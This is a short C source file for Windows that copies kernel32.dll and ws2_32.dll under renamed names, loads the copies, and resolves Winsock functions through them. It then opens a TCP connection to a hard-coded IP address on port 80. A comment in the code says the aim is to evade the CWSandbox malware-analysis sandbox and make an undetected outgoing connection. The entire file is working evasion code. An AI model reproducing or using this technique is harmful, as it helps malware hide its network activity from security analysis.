#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <strsafe.h>
#include <tchar.h>
#include <winsock.h>

typedef FARPROC (CALLBACK *GETPROC)(HMODULE, LPCSTR);
typedef SOCKET (CALLBACK *WSASOCK)(int, int, int, DWORD, DWORD, DWORD);
typedef INT (CALLBACK *WSACONN)(SOCKET, const struct sockaddr*, INT);
typedef INT (CALLBACK *WSASTART)(WORD, LPWSADATA);

HMODULE
LoadDLL(LPCTSTR module)
{
	HMODULE hmod;
	TCHAR sys[MAX_PATH], cwd[MAX_PATH], dll[MAX_PATH], src[MAX_PATH], dst[MAX_PATH];
	GetSystemDirectory(sys, MAX_PATH);
	GetCurrentDirectory(MAX_PATH, cwd);
	StringCchPrintf(dll, MAX_PATH, TEXT("b0rked-%s"), module);
	StringCchPrintf(src, MAX_PATH, TEXT("%s\\%s"), sys, module);
	StringCchPrintf(dst, MAX_PATH, TEXT("%s\\%s"), cwd, dll);
	CopyFile(src, dst, FALSE);
	hmod = LoadLibrary(dll);
	return hmod;
}

int main()
{
	SOCKET s; 
	WSADATA info; 
	struct sockaddr_in sa; 
	
	HMODULE kernel32 = LoadDLL(_T("kernel32.dll"));
	GETPROC _GetProcAddress = (GETPROC) GetProcAddress(kernel32, "GetProcAddress");

	HMODULE ws2_32 = LoadDLL(_T("ws2_32.dll"));
	WSASTART _WSAStartup = (WSASTART) _GetProcAddress(ws2_32, "WSAStartup");
	WSASOCK _WSASocketW = (WSASOCK) _GetProcAddress(ws2_32, "WSASocketW");
	WSACONN _connect = (WSACONN) _GetProcAddress(ws2_32, "connect");

	memset(&sa, 0, sizeof(sa));
	memcpy(&sa.sin_addr, "\x48\x0e\xcf\x63", 4); 
	sa.sin_family = AF_INET;
	sa.sin_port = htons(80);

	/* evade CWSandbox and make undetected outgoing network connection */
	_WSAStartup(MAKEWORD(2, 0), &info);
	s = _WSASocketW(AF_INET, SOCK_STREAM, 0, 0, 0, 0); 
	_connect(s, (struct sockaddr *)&sa, sizeof sa);

	return 0;
}